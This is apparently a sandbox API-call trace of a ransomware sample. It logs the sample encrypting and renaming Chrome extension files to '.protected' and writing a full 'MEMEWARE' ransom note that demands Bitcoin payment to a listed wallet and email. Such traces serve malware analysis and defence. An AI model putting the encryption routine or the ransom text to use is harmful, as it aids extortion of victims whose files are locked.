[0079.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\..") returned 145 [0079.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.237] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.237] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.238] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.238] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.238] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.238] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.238] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0079.239] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.239] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0079.239] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.239] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.240] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.240] CloseHandle (hObject=0x168) returned 1 [0079.240] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected") returned 166 [0079.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0079.241] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.241] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.241] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 160 [0079.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.241] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.241] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.242] lstrlenA (lpString="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") returned 684 [0079.242] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.242] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.242] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.242] CloseHandle (hObject=0x164) returned 1 [0079.242] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el") returned 142 [0079.243] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0079.243] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*") returned 144 [0079.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.243] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\.") returned 144 [0079.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.243] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\..") returned 145 [0079.243] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.243] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.244] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.244] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.244] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.244] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0079.245] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.245] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x149, lpOverlapped=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x149, lpOverlapped=0x0) returned 1 [0079.246] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.246] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.246] CloseHandle (hObject=0x168) returned 1 [0079.246] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected") returned 166 [0079.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0079.247] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.247] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 160 [0079.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.247] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.248] lstrlenA (lpString="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") returned 684 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.248] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.248] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.249] CloseHandle (hObject=0x164) returned 1 [0079.249] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0079.249] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0079.249] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB") returned 145 [0079.249] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0079.249] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0079.249] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*") returned 147 [0079.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0x47bc10 [0079.249] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.249] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.249] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.249] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\.") returned 147 [0079.249] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.249] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.250] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.250] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.250] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\..") returned 148 [0079.250] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.250] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.250] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.250] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.250] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.250] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.250] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0079.251] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
